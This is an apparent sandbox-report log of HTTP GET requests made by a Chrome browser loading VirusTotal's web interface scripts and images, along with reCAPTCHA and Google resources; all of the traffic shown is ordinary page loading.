Source: global traffic	HTTP traffic detected: GET /gui/36253.6f4dc6a9d8dab2123ae5.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.230491043.1736959486; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959489.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/25076.be47e378edc0f5eb13be.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959489.0.0.0; _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1
Source: global traffic	HTTP traffic detected: GET /gui/88116.6518b1d1356f23e2144b.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959489.0.0.0; _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1
Source: global traffic	HTTP traffic detected: GET /gui/vt-ui-sw-installer.3166763520a2b299ee12.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959489.0.0.0; _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1
Source: global traffic	HTTP traffic detected: GET /gui/36253.6f4dc6a9d8dab2123ae5.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959489.0.0.0; _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1
Source: global traffic	HTTP traffic detected: GET /gui/static/qrcode.min.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959489.0.0.0; _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1
Source: global traffic	HTTP traffic detected: GET /gui/vt-ui-sw-installer.3166763520a2b299ee12.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959489.0.0.0; _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1
Source: global traffic	HTTP traffic detected: GET /gui/88116.6518b1d1356f23e2144b.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959489.0.0.0; _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1
Source: global traffic	HTTP traffic detected: GET /gui/static/qrcode.min.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959489.0.0.0; _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1
Source: global traffic	HTTP traffic detected: GET /recaptcha/api2/anchor?ar=1&k=6Ldjgd0kAAAAAITm7ipWF7o7kPL_81SaSfdINiOc&co=aHR0cHM6Ly93d3cudmlydXN0b3RhbC5jb206NDQz&hl=en&v=zIriijn3uj5Vpknvt_LnfNbF&size=invisible&cb=22vaoty9boel HTTP/1.1Host: recaptcha.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /recaptcha/api2/webworker.js?hl=en&v=zIriijn3uj5Vpknvt_LnfNbF HTTP/1.1Host: recaptcha.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://recaptcha.net/recaptcha/api2/anchor?ar=1&k=6Ldjgd0kAAAAAITm7ipWF7o7kPL_81SaSfdINiOc&co=aHR0cHM6Ly93d3cudmlydXN0b3RhbC5jb206NDQz&hl=en&v=zIriijn3uj5Vpknvt_LnfNbF&size=invisible&cb=22vaoty9boelAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /js/bg/CY4IdQ8PNOqs9ugPxTaJh2hYWy8m1lFu__OIecPWn-w.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CIu2yQEIprbJAQipncoBCOvUygEI/IPLAQiVocsBCIWgzQEI6cXNAQi5ys0BCInTzQEYwcvMARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://recaptcha.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=520=LnnDfJWmvTG267wH4QJvcul0IvKrwvyw8MPaq-l42CpCu579z6rv5ud_KaMqYOWEOfjIq5nSoUfqgvvLgqEHZBEBiJZ6lvtm5TPnh_pa0ln8SYsnSFEEdakc_KkJFoEJaks0CuZ4gj73OFTbCo49e7sbQf7hCVR1MzbU_H44un5ABG7i19FQ2rYz87-tGIDutxVRvdgu
Source: global traffic	HTTP traffic detected: GET /recaptcha/api2/webworker.js?hl=en&v=zIriijn3uj5Vpknvt_LnfNbF HTTP/1.1Host: recaptcha.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /js/bg/CY4IdQ8PNOqs9ugPxTaJh2hYWy8m1lFu__OIecPWn-w.js HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /X-Client-Data: CIu2yQEIprbJAQipncoBCOvUygEI/IPLAQiVocsBCIWgzQEI6cXNAQi5ys0BCInTzQEYwcvMARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=520=LnnDfJWmvTG267wH4QJvcul0IvKrwvyw8MPaq-l42CpCu579z6rv5ud_KaMqYOWEOfjIq5nSoUfqgvvLgqEHZBEBiJZ6lvtm5TPnh_pa0ln8SYsnSFEEdakc_KkJFoEJaks0CuZ4gj73OFTbCo49e7sbQf7hCVR1MzbU_H44un5ABG7i19FQ2rYz87-tGIDutxVRvdgu
Source: global traffic	HTTP traffic detected: GET /gui/static/opensearch.xml HTTP/1.1Host: www.virustotal.comConnection: keep-aliveSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /gui/images/favicon.svg HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959494.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/service-worker.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveCache-Control: max-age=0Accept: /Service-Worker: scriptSec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://www.virustotal.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959494.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/manifest.json HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: manifestReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /gui/images/favicon.svg HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959494.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/images/manifest/icon-192x192.png HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959494.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/87347.c002f57d03220f54c084.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/49272.372a1ed11135b11cd4f7.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/53967.5b914cf2886ab055ed88.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/22232.15ef530edb01268cfe7b.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/60996.d3e9ab9fe2567126de2e.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/images/manifest/icon-192x192.png HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/49272.372a1ed11135b11cd4f7.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/64098.3377bd9636d2bbe06657.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/87379.10e7a557de64c909c07d.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/22232.15ef530edb01268cfe7b.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/87347.c002f57d03220f54c084.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/85236.f2afef810314bd199050.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/5200.cbf2a82371bebc862a72.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/60996.d3e9ab9fe2567126de2e.js HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/1700.226b3fc193308e865f4c.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/88279.532f3865c685074ed6bc.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/40946.52e58c8b2a8b55ad5067.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
Source: global traffic	HTTP traffic detected: GET /gui/58686.f1ac5a4a1e085aafcbb6.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.230491043.1736959486; _gid=GA1.2.1508108559.1736959491; _gat=1; _ga_BLNDV9X2JR=GS1.1.1736959485.1.0.1736959498.0.0.0
